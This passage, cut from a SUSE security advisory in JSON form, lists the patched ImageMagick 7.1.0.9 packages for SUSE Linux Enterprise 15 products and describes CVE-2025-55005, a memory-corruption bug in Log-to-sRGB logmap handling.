"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "moderate"
}
],
"title": "CVE-2025-55004"
},
{
"cve": "CVE-2025-55005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55005"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-1, when preparing to transform from Log to sRGB colorspaces, the logmap construction fails to handle cases where the reference-black or reference-white value is larger than 1024. This leads to corrupting memory beyond the end of the allocated logmap buffer. This issue has been patched in version 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
